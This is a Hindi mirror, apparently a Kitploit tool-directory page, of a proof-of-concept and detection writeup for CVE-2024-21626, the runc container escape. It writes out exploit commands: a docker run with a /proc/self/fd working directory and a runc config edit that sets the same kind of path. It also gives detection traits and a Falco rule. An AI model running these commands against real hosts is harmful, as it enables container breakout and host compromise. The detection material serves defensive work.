Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-21626 — CVE-2024-21626 के लिए PoC और पहचान | Kitploit
उपकरण/GitHubGitHub/nitrocao/cve-2024-21626
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणघुसपैठ का पता लगानाघटना प्रतिक्रियाकंटेनर एस्केप
GitHubnitrocao/cve-2024-21626

CVE-2024-21626

CVE-2024-21626 के लिए PoC और पहचान

रिपॉजिटरी देखें
771252 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-21626

इस कमज़ोरी के विस्तृत विवरण के लिए, कृपया मेरा लेख देखें।

शोषण

कंटेनर चलाकर शोषण

कस्टम इमेज बनाने की आवश्यकता नहीं, बस -w पैरामीटर के साथ एक कंटेनर चलाएँ:

root@kitploit:~
docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm

कंटेनर चलाकर शोषण

चल रहे कंटेनर में Exec करके शोषण

चल रहे कंटेनर में exec करके शोषण

runc के माध्यम से शोषण

root@kitploit:~
~/container/runc/runc --version
docker run --name helper-ctr alpine
docker export helper-ctr --output alpine.tar
mkdir rootfs
tar xf alpine.tar -C rootfs
~/container/runc/runc spec
sed -ri 's#(\s*"cwd": )"(/)"#\1 "/proc/self/fd/7"#g' config.json
grep cwd config.json
sudo ~/container/runc/runc --log ./log.json run demo

runc के माध्यम से शोषण

कैसे पता लगाएं

शोषण में निम्नलिखित विशेषताएँ होती हैं:

  • एक कंटेनर execve(2) के साथ एक प्रक्रिया को एक विशेष कार्यशील निर्देशिका के साथ चलाएगा जो /proc/self/fd/ से शुरू होती है।
  • एक कंटेनर symlink(2) या symlinkat(2) के माध्यम से एक विशेष लक्ष्य निर्देशिका लिंक के साथ प्रतीकात्मक लिंक बनाएगा जो /proc/self/fd/ से शुरू होता है।
  • एक कंटेनर open(2), openat(2) या openat2(2) के माध्यम से फ़ाइलों को ऐसे फ़ाइल नामों के साथ खोलेगा जैसे /proc/\d+/cwd/.*।

synk से Leaky vessels डायनामिक डिटेक्टर

https://github.com/snyk/leaky-vessels-dynamic-detector

Falco

यहाँ कस्टम Falco नियम है:

root@kitploit:~
- macro: container
  condition: (container.id != host and container.name exists)

- rule: CVE-2024-21626 (runC escape through /proc/[PID]/cwd) exploited
  desc: >
    CVE-2024-21626 का पता लगाएं, /proc/[PID]/cwd के माध्यम से runC एस्केप कमज़ोरी।
  condition: >
    container and ((evt.type = execve and proc.cwd startswith "/proc/self/fd") or (evt.type in (open, openat, openat2) and fd.name glob "/proc/*/cwd/*") or (evt.type in (symlink, symlinkat) and fs.path.target startswith "/proc/self/fd/")) and proc.name != "runc:[1:CHILD]"
  output: CVE-2024-21626 का शोषण हुआ (%container.info evt_type=%evt.type process=%proc.name command=%proc.cmdline target=%fs.path.targetraw)
  priority: CRITICAL

लेकिन proc.name के साथ गलत सकारात्मक फ़िल्टर करना एक अच्छा विचार नहीं है।

Falco के साथ शोषण का पता लगाएं

संदर्भ

  • https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv
  • https://github.com/opencontainers/runc/commit/8e1cd2f56d518f8d6292b8bb39f0d0932e4b6c2a
  • https://github.com/opencontainers/runc/commit/f2f16213e174fb63e931fe0546bbbad1d9bbed6f
  • https://github.com/opencontainers/runc/commit/89c93ddf289437d5c8558b37047c54af6a0edb48
  • https://github.com/opencontainers/runc/commit/ee73091a8d28692fa4868bac81aa40a0b05f9780
  • https://access.redhat.com/security/cve/cve-2024-21626
  • https://github.com/snyk/leaky-vessels-dynamic-detector
  • https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-21626
  • https://github.com/snyk/leaky-vessels-dynamic-detector
टूल डाउनलोड करें